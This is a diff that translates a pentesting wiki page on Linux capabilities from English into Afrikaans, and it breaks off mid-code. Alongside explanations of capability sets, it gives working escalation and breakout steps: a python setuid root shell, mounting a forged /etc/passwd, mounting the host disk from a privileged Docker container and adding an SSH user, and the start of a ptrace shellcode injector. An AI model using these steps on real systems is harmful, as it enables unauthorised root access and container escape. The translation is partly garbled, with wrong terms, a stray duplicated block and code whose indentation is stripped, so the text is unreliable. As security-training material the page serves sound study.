gebruik. -3. **Permitted (CapPrm)**: - - **Purpose**: Defines the maximum set of capabilities a process can possess. - - **Functionality**: A process can elevate a capability from the permitted set to its effective set, giving it the ability to use that capability. It can also drop capabilities from its permitted set. - - **Boundary**: It acts as an upper limit for the capabilities a process can have, ensuring a process doesn't exceed its predefined privilege scope. +3. **Toegelaat (CapPrm)**: +- **Doel**: Definieer die maksimum stel vermoëns wat 'n proses kan besit. +- **Funksionaliteit**: 'n Proses kan 'n vermoë van die toegelate stel na sy effektiewe stel verhoog, wat hom die vermoë gee om daardie vermoë te gebruik. Dit kan ook vermoëns uit sy toegelate stel verwyder. +- **Grens**: Dit tree op as 'n boonste grens vir die vermoëns wat 'n proses kan hê, en verseker dat 'n proses nie sy voorafbepaalde voorregomvang oorskry nie. -4. **Bounding (CapBnd)**: - - **Purpose**: Puts a ceiling on the capabilities a process can ever acquire during its lifecycle. - - **Functionality**: Even if a process has a certain capability in its inheritable or permitted set, it cannot acquire that capability unless it's also in the bounding set. - - **Use-case**: This set is particularly useful for restricting a process's privilege escalation potential, adding an extra layer of security. - -5. **Ambient (CapAmb)**: - - **Purpose**: Allows certain capabilities to be maintained across an `execve` system call, which typically would result in a full reset of the process's capabilities. - - **Functionality**: Ensures that non-SUID programs that don't have associated file capabilities can retain certain privileges. - - **Restrictions**: Capabilities in this set are subject to the constraints of the inheritable and permitted sets, ensuring they don't exceed the process's allowed privileges. +4. **Begrens (CapBnd)**: +- **Doel**: Stel 'n plafon op die vermoëns wat 'n proses gedurende sy lewensiklus kan bekom. +- **Funksionaliteit**: Selfs as 'n proses 'n sekere vermoë in sy oorerfbare of toegelate stel het, kan dit nie daardie vermoë bekom tensy dit ook in die begrensingsstel is nie. +- **Gebruiksscenario**: Hierdie stel is veral nuttig om 'n proses se potensiaal vir voorregverhoging te beperk en 'n ekstra laag sekuriteit toe te voeg. +5. **Omringend (CapAmb)**: +- **Doel**: Maak dit moontlik dat sekere vermoëns behoue bly tydens 'n `execve`-sisteemaanroep, wat normaalweg sou lei tot 'n volledige herstel van die proses se vermoëns. +- **Funksionaliteit**: Verseker dat nie-SUID-programme wat nie geassosieerde lêervermoëns het nie, sekere voorregte kan behou. +- **Beperkings**: Vermoëns in hierdie stel is onderhewig aan die beperkings van die oorerfbare en toegelate stelle, om te verseker dat hulle nie die proses se toegelate voorregte oorskry nie. ```python # Code to demonstrate the interaction of different capability sets might look like this: # Note: This is pseudo-code for illustrative purposes only. def manage_capabilities(process): - if process.has_capability('cap_setpcap'): - process.add_capability_to_set('CapPrm', 'new_capability') - process.limit_capabilities('CapBnd') - process.preserve_capabilities_across_execve('CapAmb') +if process.has_capability('cap_setpcap'): +process.add_capability_to_set('CapPrm', 'new_capability') +process.limit_capabilities('CapBnd') +process.preserve_capabilities_across_execve('CapAmb') ``` - -For further information check: +Vir verdere inligting, kyk na: * [https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work](https://blog.container-solutions.com/linux-capabilities-why-they-exist-and-how-they-work) * [https://blog.ploetzli.ch/2014/understanding-linux-capabilities/](https://blog.ploetzli.ch/2014/understanding-linux-capabilities/) -## Processes & Binaries Capabilities +## Prosesse & Binêre Kapasiteite -### Processes Capabilities +### Prosesse Kapasiteite -To see the capabilities for a particular process, use the **status** file in the /proc directory. As it provides more details, let’s limit it only to the information related to Linux capabilities.\ -Note that for all running processes capability information is maintained per thread, for binaries in the file system it’s stored in extended attributes. +Om die kapasiteite vir 'n spesifieke proses te sien, gebruik die **status** lêer in die /proc gids. Aangesien dit meer besonderhede verskaf, beperk ons dit slegs tot die inligting wat verband hou met Linux kapasiteite.\ +Let daarop dat vir alle lopende prosesse kapasiteitinligting per draad onderhou word, en vir binêre lêers in die lêersisteem word dit in uitgebreide eienskappe gestoor. -You can find the capabilities defined in /usr/include/linux/capability.h - -You can find the capabilities of the current process in `cat /proc/self/status` or doing `capsh --print` and of other users in `/proc//status` +Jy kan die kapasiteite wat in /usr/include/linux/capability.h gedefinieer is, vind. +Jy kan die kapasiteite van die huidige proses vind in `cat /proc/self/status` of deur `capsh --print` te doen, en van ander gebruikers in `/proc//status`. ```bash cat /proc/1234/status | grep Cap cat /proc/$$/status | grep Cap #This will print the capabilities of the current process ``` +Hierdie bevel moet 5 lyne op die meeste stelsels teruggee. -This command should return 5 lines on most systems. - -* CapInh = Inherited capabilities -* CapPrm = Permitted capabilities -* CapEff = Effective capabilities -* CapBnd = Bounding set -* CapAmb = Ambient capabilities set - +* CapInh = Geërfde vermoëns +* CapPrm = Toegelate vermoëns +* CapEff = Effektiewe vermoëns +* CapBnd = Grensstellings +* CapAmb = Omgewingsvermoëns stel ```bash #These are the typical capabilities of a root owned process (all) CapInh: 0000000000000000 @@ -101,16 +96,12 @@ CapEff: 0000003fffffffff CapBnd: 0000003fffffffff CapAmb: 0000000000000000 ``` - -These hexadecimal numbers don’t make sense. Using the capsh utility we can decode them into the capabilities name. - +Hierdie heksadesimale getalle maak nie sin nie. Deur die capsh-hulpprogram te gebruik, kan ons hulle ontsleutel na die naam van die vermoëns. ```bash capsh --decode=0000003fffffffff 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,37 ``` - -Lets check now the **capabilities** used by `ping`: - +Laten ons nou die **vermoëns** wat deur `ping` gebruik word, nagaan: ```bash cat /proc/9491/status | grep Cap CapInh: 0000000000000000 @@ -122,15 +113,11 @@ CapAmb: 0000000000000000 capsh --decode=0000000000003000 0x0000000000003000=cap_net_admin,cap_net_raw ``` - -Although that works, there is another and easier way. To see the capabilities of a running process, simply use the **getpcaps** tool followed by its process ID (PID). You can also provide a list of process IDs. - +Alhoewel dit werk, is daar 'n ander en makliker manier. Om die vermoëns van 'n lopende proses te sien, gebruik eenvoudig die **getpcaps**-instrument gevolg deur sy proses-ID (PID). Jy kan ook 'n lys van proses-ID's voorsien. ```bash getpcaps 1234 ``` - -Lets check here the capabilities of `tcpdump` after having giving the binary enough capabilities (`cap_net_admin` and `cap_net_raw`) to sniff the network (_tcpdump is running in process 9562_): - +Laten ons hier die vermoëns van `tcpdump` nagaan nadat die binêre lêer genoeg vermoëns (`cap_net_admin` en `cap_net_raw`) gekry het om die netwerk te bespeur (_tcpdump word uitgevoer in proses 9562_): ```bash #The following command give tcpdump the needed capabilities to sniff traffic $ setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump @@ -148,53 +135,42 @@ CapAmb: 0000000000000000 $ capsh --decode=0000000000003000 0x0000000000003000=cap_net_admin,cap_net_raw ``` +Soos u kan sien, stem die gegee bevoegdhede ooreen met die resultate van die 2 maniere om die bevoegdhede van 'n binêre lêer te bekom. Die _getpcaps_ hulpmiddel gebruik die **capget()** stelseloproep om die beskikbare bevoegdhede vir 'n spesifieke draad te ondersoek. Hierdie stelseloproep hoef slegs die PID te voorsien om meer inligting te verkry. -As you can see the given capabilities corresponds with the results of the 2 ways of getting the capabilities of a binary.\ -The _getpcaps_ tool uses the **capget()** system call to query the available capabilities for a particular thread. This system call only needs to provide the PID to obtain more information. - -### Binaries Capabilities - -Binaries can have capabilities that can be used while executing. For example, it's very common to find `ping` binary with `cap_net_raw` capability: +### Binêre Bevoegdhede +Binêre lêers kan bevoegdhede hê wat tydens uitvoering gebruik kan word. Byvoorbeeld, dit is baie algemeen om die `ping` binêre lêer met die `cap_net_raw` bevoegdheid te vind: ```bash getcap /usr/bin/ping /usr/bin/ping = cap_net_raw+ep ``` - -You can **search binaries with capabilities** using: - +Jy kan **binêre lêers met vermoëns soek** deur die volgende te gebruik: ```bash getcap -r / 2>/dev/null ``` +### Laat kapasiteite val met capsh -### Dropping capabilities with capsh - -If we drop the CAP\_NET\_RAW capabilities for _ping_, then the ping utility should no longer work. - +As ons die CAP\_NET\_RAW kapasiteite laat val vir _ping_, behoort die ping nut nie meer te werk nie. ```bash capsh --drop=cap_net_raw --print -- -c "tcpdump" ``` +Behalwe die uitset van _capsh_ self, moet die _tcpdump_ bevel self ook 'n fout veroorsaak. -Besides the output of _capsh_ itself, the _tcpdump_ command itself should also raise an error. +> /bin/bash: /usr/sbin/tcpdump: Operasie nie toegelaat nie -> /bin/bash: /usr/sbin/tcpdump: Operation not permitted +Die fout wys duidelik dat die ping bevel nie toegelaat word om 'n ICMP sokket oop te maak nie. Nou weet ons verseker dat dit soos verwag werk. -The error clearly shows that the ping command is not allowed to open an ICMP socket. Now we know for sure that this works as expected. - -### Remove Capabilities - -You can remove capabilities of a binary with +### Verwyder Bekwaamhede +Jy kan bekwaamhede van 'n binêre lêer verwyder met ```bash setcap -r ``` +## Gebruikerseienaarskappe -## User Capabilities - -Apparently **it's possible to assign capabilities also to users**. This probably means that every process executed by the user will be able to use the users capabilities.\ -Base on on [this](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [this ](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html)and [this ](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user)a few files new to be configured to give a user certain capabilities but the one assigning the capabilities to each user will be `/etc/security/capability.conf`.\ -File example: - +Blykbaar is dit ook moontlik om eienaarskappe aan gebruikers toe te ken. Dit beteken waarskynlik dat elke proses wat deur die gebruiker uitgevoer word, die gebruikers se eienaarskappe kan gebruik. +Gebaseer op [hierdie](https://unix.stackexchange.com/questions/454708/how-do-you-add-cap-sys-admin-permissions-to-user-in-centos-7), [hierdie](http://manpages.ubuntu.com/manpages/bionic/man5/capability.conf.5.html) en [hierdie](https://stackoverflow.com/questions/1956732/is-it-possible-to-configure-linux-capabilities-per-user) moet 'n paar nuwe lêers gekonfigureer word om 'n gebruiker sekere eienaarskappe te gee, maar die een wat die eienaarskappe aan elke gebruiker toeken, sal `/etc/security/capability.conf` wees. +Lêer voorbeeld: ```bash # Simple cap_sys_ptrace developer @@ -208,25 +184,24 @@ cap_net_admin,cap_net_raw jrnetadmin # Combining names and numerics cap_sys_admin,22,25 jrsysadmin ``` +## Omgewingsvermoëns -## Environment Capabilities - -Compiling the following program it's possible to **spawn a bash shell inside an environment that provides capabilities**. +Deur die volgende program te kompileer, is dit moontlik om **'n bash-skulp te skep binne 'n omgewing wat vermoëns bied**. {% code title="ambient.c" %} ```c /* - * Test program for the ambient capabilities - * - * compile using: - * gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c - * Set effective, inherited and permitted capabilities to the compiled binary - * sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient - * - * To get a shell with additional caps that can be inherited do: - * - * ./ambient /bin/bash - */ +* Test program for the ambient capabilities +* +* compile using: +* gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c +* Set effective, inherited and permitted capabilities to the compiled binary +* sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient +* +* To get a shell with additional caps that can be inherited do: +* +* ./ambient /bin/bash +*/ #include #include @@ -237,114 +212,107 @@ Compiling the following program it's possible to **spawn a bash shell inside an #include static void set_ambient_cap(int cap) { - int rc; - capng_get_caps_process(); - rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap); - if (rc) { - printf("Cannot add inheritable cap\n"); - exit(2); - } - capng_apply(CAPNG_SELECT_CAPS); - /* Note the two 0s at the end. Kernel checks for these */ - if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) { - perror("Cannot set cap"); - exit(1); - } +int rc; +capng_get_caps_process(); +rc = capng_update(CAPNG_ADD, CAPNG_INHERITABLE, cap); +if (rc) { +printf("Cannot add inheritable cap\n"); +exit(2); +} +capng_apply(CAPNG_SELECT_CAPS); +/* Note the two 0s at the end. Kernel checks for these */ +if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_RAISE, cap, 0, 0)) { +perror("Cannot set cap"); +exit(1); +} } void usage(const char * me) { - printf("Usage: %s [-c caps] new-program new-args\n", me); - exit(1); +printf("Usage: %s [-c caps] new-program new-args\n", me); +exit(1); } int default_caplist[] = { - CAP_NET_RAW, - CAP_NET_ADMIN, - CAP_SYS_NICE, - -1 +CAP_NET_RAW, +CAP_NET_ADMIN, +CAP_SYS_NICE, +-1 }; int * get_caplist(const char * arg) { - int i = 1; - int * list = NULL; - char * dup = strdup(arg), * tok; - for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) { - list = realloc(list, (i + 1) * sizeof(int)); - if (!list) { - perror("out of memory"); - exit(1); - } - list[i - 1] = atoi(tok); - list[i] = -1; - i++; - } - return list; +int i = 1; +int * list = NULL; +char * dup = strdup(arg), * tok; +for (tok = strtok(dup, ","); tok; tok = strtok(NULL, ",")) { +list = realloc(list, (i + 1) * sizeof(int)); +if (!list) { +perror("out of memory"); +exit(1); +} +list[i - 1] = atoi(tok); +list[i] = -1; +i++; +} +return list; } int main(int argc, char ** argv) { - int rc, i, gotcaps = 0; - int * caplist = NULL; - int index = 1; // argv index for cmd to start - if (argc < 2) - usage(argv[0]); - if (strcmp(argv[1], "-c") == 0) { - if (argc <= 3) { - usage(argv[0]); - } - caplist = get_caplist(argv[2]); - index = 3; - } - if (!caplist) { - caplist = (int * ) default_caplist; - } - for (i = 0; caplist[i] != -1; i++) { - printf("adding %d to ambient list\n", caplist[i]); - set_ambient_cap(caplist[i]); - } - printf("Ambient forking shell\n"); - if (execv(argv[index], argv + index)) - perror("Cannot exec"); - return 0; +int rc, i, gotcaps = 0; +int * caplist = NULL; +int index = 1; // argv index for cmd to start +if (argc < 2) +usage(argv[0]); +if (strcmp(argv[1], "-c") == 0) { +if (argc <= 3) { +usage(argv[0]); +} +caplist = get_caplist(argv[2]); +index = 3; +} +if (!caplist) { +caplist = (int * ) default_caplist; +} +for (i = 0; caplist[i] != -1; i++) { +printf("adding %d to ambient list\n", caplist[i]); +set_ambient_cap(caplist[i]); +} +printf("Ambient forking shell\n"); +if (execv(argv[index], argv + index)) +perror("Cannot exec"); +return 0; } ``` {% endcode %} - ```bash gcc -Wl,--no-as-needed -lcap-ng -o ambient ambient.c sudo setcap cap_setpcap,cap_net_raw,cap_net_admin,cap_sys_nice+eip ambient ./ambient /bin/bash ``` - -Inside the **bash executed by the compiled ambient binary** it's possible to observe the **new capabilities** (a regular user won't have any capability in the "current" section). - +Binne die **bash wat uitgevoer word deur die saamgestelde omgewingsbinêre**, is dit moontlik om die **nuwe vermoëns** waar te neem ( 'n gewone gebruiker sal geen vermoë in die "huidige" afdeling hê nie). ```bash capsh --print Current: = cap_net_admin,cap_net_raw,cap_sys_nice+eip ``` - {% hint style="danger" %} -You can **only add capabilities that are present** in both the permitted and the inheritable sets. +Jy kan **slegs vermoëns byvoeg wat teenwoordig is** in beide die toegelate en die oorerflike stelle. {% endhint %} -### Capability-aware/Capability-dumb binaries +### Vermoënsbewuste/vermoënsdomme bineêre lêers -The **capability-aware binaries won't use the new capabilities** given by the environment, however the **capability dumb binaries will us**e them as they won't reject them. This makes capability-dumb binaries vulnerable inside a special environment that grant capabilities to binaries. +Die **vermoënsbewuste bineêre lêers sal nie die nuwe vermoëns** wat deur die omgewing gegee word, gebruik nie, terwyl die **vermoënsdomme bineêre lêers** dit sal gebruik omdat hulle dit nie sal verwerp nie. Dit maak vermoënsdomme bineêre lêers kwesbaar binne 'n spesiale omgewing wat vermoëns aan bineêre lêers toeken. -## Service Capabilities - -By default a **service running as root will have assigned all the capabilities**, and in some occasions this may be dangerous.\ -Therefore, a **service configuration** file allows to **specify** the **capabilities** you want it to have, **and** the **user** that should execute the service to avoid running a service with unnecessary privileges: +## Diensvermoëns +Standaard sal 'n **diens wat as root uitgevoer word, alle vermoëns toegewys kry**, en in sommige gevalle kan dit gevaarlik wees.\ +Daarom maak 'n **dienskonfigurasie**-lêer dit moontlik om die **vermoëns** wat jy wil hê dat dit moet hê, **en** die **gebruiker** wat die diens moet uitvoer, te **spesifiseer** om te voorkom dat 'n diens met onnodige bevoegdhede uitgevoer word: ```bash [Service] User=bob AmbientCapabilities=CAP_NET_BIND_SERVICE ``` +## Bevoegdhede in Docker-houers -## Capabilities in Docker Containers - -By default Docker assigns a few capabilities to the containers. It's very easy to check which capabilities are these by running: - +Standaard ken Docker 'n paar bevoegdhede toe aan die houers. Dit is baie maklik om te kontroleer watter bevoegdhede dit is deur die volgende uit te voer: ```bash docker run --rm -it r.j3ss.co/amicontained bash Capabilities: - BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap +BOUNDING -> chown dac_override fowner fsetid kill setgid setuid setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap # Add a capabilities docker run --rm -it --cap-add=SYS_ADMIN r.j3ss.co/amicontained bash @@ -355,21 +323,17 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash # Remove all and add only one docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash ``` - -​ -
-​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteitsgebeurtenis in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} ## Privesc/Container Escape -Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root. - -You can force capabilities upon programs using `setcap`, and query these using `getcap`: +Vermoëns is nuttig wanneer jy **jou eie prosesse wil beperk na die uitvoering van bevoorregte operasies** (bv. na die opstel van chroot en bind aan 'n sokket). Dit kan egter uitgebuit word deur kwaadwillige opdragte of argumente wat dan as root uitgevoer word. +Jy kan vermoëns afdwing op programme deur gebruik te maak van `setcap`, en dit ondersoek deur gebruik te maak van `getcap`: ```bash #Set Capability setcap cap_net_raw+ep /sbin/ping @@ -378,19 +342,15 @@ setcap cap_net_raw+ep /sbin/ping getcap /sbin/ping /sbin/ping = cap_net_raw+ep ``` +Die `+ep` beteken dat jy die vermoë byvoeg ("-" sal dit verwyder) as Effektief en Toegelaat. -The `+ep` means you’re adding the capability (“-” would remove it) as Effective and Permitted. - -To identify programs in a system or folder with capabilities: - +Om programme in 'n stelsel of vouer met vermoëns te identifiseer: ```bash getcap -r / 2>/dev/null ``` +### Uitbuiting voorbeeld -### Exploitation example - -In the following example the binary `/usr/bin/python2.6` is found vulnerable to privesc: - +In die volgende voorbeeld word gevind dat die binêre lêer `/usr/bin/python2.6` vatbaar is vir bevoorregte eskalasie: ```bash setcap cap_setuid+ep /usr/bin/python2.7 /usr/bin/python2.7 = cap_setuid+ep @@ -398,46 +358,65 @@ setcap cap_setuid+ep /usr/bin/python2.7 #Exploit /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");' ``` +**Vermoëns** wat deur `tcpdump` benodig word om **enige gebruiker in staat te stel om pakkies te onderskep**: -**Capabilities** needed by `tcpdump` to **allow any user to sniff packets**: +```markdown +To allow any user to sniff packets, the `tcpdump` binary needs the following capabilities: +1. `CAP_NET_RAW`: This capability allows the binary to create raw sockets, which are necessary for packet sniffing. + +To grant these capabilities to the `tcpdump` binary, you can use the `setcap` command as follows: + +```bash +sudo setcap cap_net_raw=eip /usr/sbin/tcpdump +``` + +After setting the capabilities, any user will be able to run `tcpdump` and sniff packets without requiring root privileges. +``` +```afrikaans +Om enige gebruiker in staat te stel om pakkies te onderskep, benodig die `tcpdump` binêre lêer die volgende vermoëns: + +1. `CAP_NET_RAW`: Hierdie vermoë stel die binêre lêer in staat om rou sokkels te skep, wat nodig is vir pakkie-onderskepping. + +Om hierdie vermoëns aan die `tcpdump` binêre lêer toe te ken, kan jy die `setcap` opdrag soos volg gebruik: + +```bash +sudo setcap cap_net_raw=eip /usr/sbin/tcpdump +``` + +Nadat die vermoëns ingestel is, sal enige gebruiker in staat wees om `tcpdump` uit te voer en pakkies te onderskep sonder om root-voorregte te vereis. +``` ```bash setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump getcap /usr/sbin/tcpdump /usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip ``` +### Die spesiale geval van "leë" vermoëns -### The special case of "empty" capabilities +[Van die dokumentasie](https://man7.org/linux/man-pages/man7/capabilities.7.html): Let daarop dat 'n mens leë vermoëstelle aan 'n programlêer kan toewys, en dit is dus moontlik om 'n stel-gebruiker-ID-root-program te skep wat die effektiewe en gestoorde gebruiker-ID van die proses wat die program uitvoer, na 0 verander, maar geen vermoëns aan daardie proses verleen nie. Of, eenvoudig gestel, as jy 'n binêre lêer het wat: -[From the docs](https://man7.org/linux/man-pages/man7/capabilities.7.html): Note that one can assign empty capability sets to a program file, and thus it is possible to create a set-user-ID-root program that changes the effective and saved set-user-ID of the process that executes the program to 0, but confers no capabilities to that process. Or, simply put, if you have a binary that: +1. nie deur root besit word nie +2. geen `SUID`/`SGID`-bits ingestel het nie +3. leë vermoënsstel het (bv.: `getcap myelf` gee `myelf =ep` terug) -1. is not owned by root -2. has no `SUID`/`SGID` bits set -3. has empty capabilities set (e.g.: `getcap myelf` returns `myelf =ep`) - -then **that binary will run as root**. +sal **daardie binêre lêer as root uitgevoer word**. ## CAP\_SYS\_ADMIN -**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** is a highly potent Linux capability, often equated to a near-root level due to its extensive **administrative privileges**, such as mounting devices or manipulating kernel features. While indispensable for containers simulating entire systems, **`CAP_SYS_ADMIN` poses significant security challenges**, especially in containerized environments, due to its potential for privilege escalation and system compromise. Therefore, its usage warrants stringent security assessments and cautious management, with a strong preference for dropping this capability in application-specific containers to adhere to the **principle of least privilege** and minimize the attack surface. - -**Example with binary** +**[`CAP_SYS_ADMIN`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** is 'n hoogs kragtige Linux-vermoë, dikwels gelykgestel aan 'n bykans-rootvlak as gevolg van sy uitgebreide **administratiewe voorregte**, soos die koppel van toestelle of die manipulasie van kernelkenmerke. Terwyl dit onontbeerlik is vir houers wat hele stelsels simuleer, stel **`CAP_SYS_ADMIN` beduidende sekuriteitsuitdagings** in, veral in gehouerde omgewings, as gevolg van sy potensiaal vir voorregverhoging en stelselkompromie. Daarom vereis die gebruik daarvan streng sekuriteitsassesserings en versigtige bestuur, met 'n sterk voorkeur om hierdie vermoë in toepassingsspesifieke houers te laat val om aan die **beginsel van die minste voorreg** te voldoen en die aanvalsvlak te verminder. +**Voorbeeld met binêre lêer** ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_admin+ep ``` - -Using python you can mount a modified _passwd_ file on top of the real _passwd_ file: - +Met behulp van Python kan jy 'n gewysigde _passwd_ lêer bo-op die werklike _passwd_ lêer monteer: ```bash cp /etc/passwd ./ #Create a copy of the passwd file openssl passwd -1 -salt abc password #Get hash of "password" vim ./passwd #Change roots passwords of the fake passwd file ``` - -And finally **mount** the modified `passwd` file on `/etc/passwd`: - +En uiteindelik **monteer** die gewysigde `passwd`-lêer op `/etc/passwd`: ```python from ctypes import * libc = CDLL("libc.so.6") @@ -450,32 +429,28 @@ options = b"rw" mountflags = MS_BIND libc.mount(source, target, filesystemtype, mountflags, options) ``` +En jy sal in staat wees om **`su` as root** te gebruik met die wagwoord "password". -And you will be able to **`su` as root** using password "password". - -**Example with environment (Docker breakout)** - -You can check the enabled capabilities inside the docker container using: +**Voorbeeld met omgewing (Docker-ontsnapping)** +Jy kan die geaktiveerde vermoëns binne die Docker-houer nagaan deur die volgende te gebruik: ``` capsh --print Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read Securebits: 00/0x0/1'b0 - secure-noroot: no (unlocked) - secure-no-suid-fixup: no (unlocked) - secure-keep-caps: no (unlocked) +secure-noroot: no (unlocked) +secure-no-suid-fixup: no (unlocked) +secure-keep-caps: no (unlocked) uid=0(root) gid=0(root) groups=0(root) ``` +Binne die vorige uitset kan jy sien dat die SYS\_ADMIN-vermoë geaktiveer is. -Inside the previous output you can see that the SYS\_ADMIN capability is enabled. - -* **Mount** - -This allows the docker container to **mount the host disk and access it freely**: +* **Monteer** +Dit stel die docker-houer in staat om **die gasheer se skyf te monteer en vrylik daarop toegang te verkry**: ```bash fdisk -l #Get disk name Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors @@ -487,12 +462,10 @@ mount /dev/sda /mnt/ #Mount it cd /mnt chroot ./ bash #You have a shell inside the docker hosts disk ``` +* **Volledige toegang** -* **Full access** - -In the previous method we managed to access the docker host disk.\ -In case you find that the host is running an **ssh** server, you could **create a user inside the docker host** disk and access it via SSH: - +In die vorige metode het ons daarin geslaag om toegang tot die docker-gashouer se skyf te verkry.\ +In die geval waar jy vind dat die gashouer 'n **ssh**-bediener hardloop, kan jy 'n gebruiker **binne die docker-gashouer se skyf skep** en toegang daartoe verkry via SSH: ```bash #Like in the example before, the first step is to mount the docker host disk fdisk -l @@ -506,15 +479,13 @@ nc -v -n -w2 -z 172.17.0.1 1-65535 chroot /mnt/ adduser john ssh john@172.17.0.1 -p 2222 ``` - ## CAP\_SYS\_PTRACE -**This means that you can escape the container by injecting a shellcode inside some process running inside the host.** To access processes running inside the host the container needs to be run at least with **`--pid=host`**. +**Dit beteken dat jy die houer kan ontsnap deur 'n shellcode in te spuit in 'n proses wat binne die gasheer loop.** Om toegang te verkry tot prosesse wat binne die gasheer loop, moet die houer ten minste met **`--pid=host`** uitgevoer word. -**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** grants the ability to use debugging and system call tracing functionalities provided by `ptrace(2)` and cross-memory attach calls like `process_vm_readv(2)` and `process_vm_writev(2)`. Although powerful for diagnostic and monitoring purposes, if `CAP_SYS_PTRACE` is enabled without restrictive measures like a seccomp filter on `ptrace(2)`, it can significantly undermine system security. Specifically, it can be exploited to circumvent other security restrictions, notably those imposed by seccomp, as demonstrated by [proofs of concept (PoC) like this one](https://gist.github.com/thejh/8346f47e359adecd1d53). - -**Example with binary (python)** +**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** verleen die vermoë om die foutopsporing en stelseloproep-trasseringfunksies wat deur `ptrace(2)` en kruis-geheue-aanhegtingsoproepe soos `process_vm_readv(2)` en `process_vm_writev(2)` verskaf word, te gebruik. Alhoewel dit kragtig is vir diagnostiese en moniteringsdoeleindes, kan dit as `CAP_SYS_PTRACE` geaktiveer is sonder beperkende maatreëls soos 'n seccomp-filter op `ptrace(2)`, die stelselsekuriteit aansienlik ondermyn. Dit kan spesifiek uitgebuit word om ander sekuriteitsbeperkings te omseil, veral dié wat deur seccomp opgelê word, soos gedemonstreer deur [bewys van konsepte (PoC) soos hierdie een](https://gist.github.com/thejh/8346f47e359adecd1d53). +**Voorbeeld met binêre (python)** ```bash getcap -r / 2>/dev/null /usr/bin/python2.7 = cap_sys_ptrace+ep @@ -534,35 +505,35 @@ PTRACE_DETACH = 17 # Structure defined in # https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct class user_regs_struct(ctypes.Structure): - _fields_ = [ - ("r15", ctypes.c_ulonglong), - ("r14", ctypes.c_ulonglong), - ("r13", ctypes.c_ulonglong), - ("r12", ctypes.c_ulonglong), - ("rbp", ctypes.c_ulonglong), - ("rbx", ctypes.c_ulonglong), - ("r11", ctypes.c_ulonglong), - ("r10", ctypes.c_ulonglong), - ("r9", ctypes.c_ulonglong), - ("r8", ctypes.c_ulonglong), - ("rax", ctypes.c_ulonglong), - ("rcx", ctypes.c_ulonglong), - ("rdx", ctypes.c_ulonglong), - ("rsi", 